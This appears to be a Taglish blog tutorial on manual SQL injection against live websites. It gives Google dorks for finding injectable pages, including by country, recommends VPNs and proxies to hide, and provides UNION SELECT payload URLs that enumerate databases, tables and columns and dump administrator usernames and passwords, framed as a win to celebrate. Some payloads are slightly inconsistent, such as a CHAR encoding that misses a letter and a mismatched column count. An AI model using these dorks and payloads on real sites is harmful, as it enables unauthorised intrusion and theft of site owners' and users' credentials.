SQL(Structered Query Language) Injection Tutorial:
Tools Needed:
SQLI scanner = google nalang po..
Hack Bar = Just download this on mozilla firefox add ons,
Dorks = eto gamit para maghanap ng sites na pwede i inject. :D
Fingers = for typing
VPN(virtual private network) and Proxies = di ko na to i explain, :3 i google
nalang
BRAIN
Optional Tools
Havij and other automatic tools = ang tool na to ay automatic sql injection tool, di ka na gagamit typing, just clicks..
Note: kung gusto mo gumaling sa Sql Injection, Mag start ka muna sa Manual, coz thats the key for you to become a good injector :))
Steps:
Some of the google Dorks:
There are many google dorks, about hundreds, and you can find it on google, search lang.
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:declaration_more.php?decl_id=
inurl:pageid=inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Ok Lets Start:I search mo To sa google:inurl:index.php?id=Note: kung gusto mo ng site ng specifec na bansa o lugar just add " Site:TW " :)
ex. inurl:index.php?id= Site:TW
TW stands for taiwan kasi op taiwan daw. :3
1st. Finding vulnerable sites, 2nd. Finding amount of columns, 3rd. Getting mysql version, 4th. Getting Databases, 5th. Getting Tables, 6th Getting Columns, 7th Getting Usernames and Passwords
1. Finding vulnerable sites
Ex. eto vulnerable site ko....http://www.SAMPLESITE.com.tw/index.php?id=32
para malaman mo kung vulnerable ang site mag type ng ( ' ) sa dulo ng url
ex. http://www.SAMPLESITE.com.tw/index.php?id=32'
Pag may maglabas ng error, like
error in sql syntax .............................................................. near line 1
2. Finding Amount of Columns
Para makuha mo kung ilan ang columns, gagamitin mo ang query ma "order by #--ok,lets try order by 1-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 2-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 3-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 4-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 5-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 6-- => no error
http://www.SAMPLESITE.com.tw/index.php?id=32 order by 7-- ==>> May error na
So ibig sabihin ang columns 6 lang kasi ang error hanggang 7.. :D
ngayon hanapin na tin ang vulnerable column. To do this please folow me:
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,4,5,6--
After id= please insert [-] and it means null.
ngaun may makikita kang numbers sa website, let's say ang number na nakita ko is 4 so sa column 4 ako mag iinject.
3. Getting Mysql Version
Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,@@version,5,6--
In the vulnerable column we use @@version o version() instead of column number.ok we find it.
4. Getting Databases
Now we wanna find the databases and the Current database.Here the syntax for all databases:EX.
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(schema_name),5,6 from information_schema.schemata--
Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.
Syntax for current database:
www.SAMP:ESITE/index_en.php?id=-7 union all select 1,2,3,database(),5,6 from information_schema.schemata--
okay, nahanap na..
5th Getting Tables
ngayon gusto natin malaman ang tables ng column #4, Follow me
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
so may makikit kang tables, hanapin ang table ng admin,Maraming tables ang admin merong, administrator, users, etc/ di ko masyado maexplain, pensa ya lang... use brain..ex. table na nandito sa akin users
6. Getting Columns,
hahanapin natin ang columns, so will use following code:
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name=CHAR(117, 115, 101, 114)--
okay, obeserve mo mabuti ang column.. diba pinalitang ang (column_name) , _schema.Columns , table_name at ung database binura at pinalitan ng mysql char ng userskasi users ang table na i dudump natin.Follow. para makuha ang sql char ng "users" sa top left ng hackber may sql. before XSs, click mo un, tapos MYSQL tapos mysql CHAR, den type mo ang string "Users" at llaalalabas to CHAR(117, 115, 101, 114).. okay? gets?
7. Dumping users/pass (getting data)
Follow this steps
Now you would like to dump logins and passwords.
http://www.SAMPLESITE.com.tw/index.php?id=-32 union all select 1,2,3,group_concat(login,0x3a,pass),5,6 from users--
so ayan na. nakuha mo na ang username at pass
ex.
admin:12345!@#$%
Lets Celebrate.. :D
Note: maramimi pang methods, techniques, at bypasses ang sqli.
examples are:
Bypassing
String basedSqli
error based
Sqli sql injection (double query eror based)
ASP :D lol
SQli double query
at ang blind sqli ang di ko pa masyado kabisado. :D
maramiing ways rin sa pag exploit at pag bypass ng website, kasi halos lahat na may vulnerablilities like
Upload vulnerabelaties
XSS
CSFG
IIS exploits etc... bla2x,stay tuned for nex TUTS.... :)
0 blogger-facebook:
Post a Comment